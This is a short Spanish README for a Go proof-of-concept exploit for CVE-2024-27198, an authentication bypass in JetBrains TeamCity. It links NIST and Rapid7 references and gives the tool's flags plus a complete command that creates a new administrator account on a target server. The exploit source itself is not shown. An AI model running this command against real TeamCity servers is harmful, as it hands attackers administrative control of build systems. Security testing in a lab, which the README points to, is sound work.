
Un PoC para CVE-2024-27198 escrito en Go

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-27198
Publicación del blog de Rapid7: https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/
go run CVE-2024-27198.go -h
-s string
TeamCity Server
-p string
Nueva contraseña de administrador
-u string
Nuevo nombre de usuario de administrador
-proxy
URL del proxy (opcional)
go run CVE-2024-27198.go -s http://IP_OR_FQDN:PORT -u new_admin_username -p new_admin_password -proxy http://IP_OR_FQDN:PORT
*Consulte https://github.com/yoryio/CVE-2024-27198 para obtener instrucciones sobre cómo configurar un entorno de laboratorio.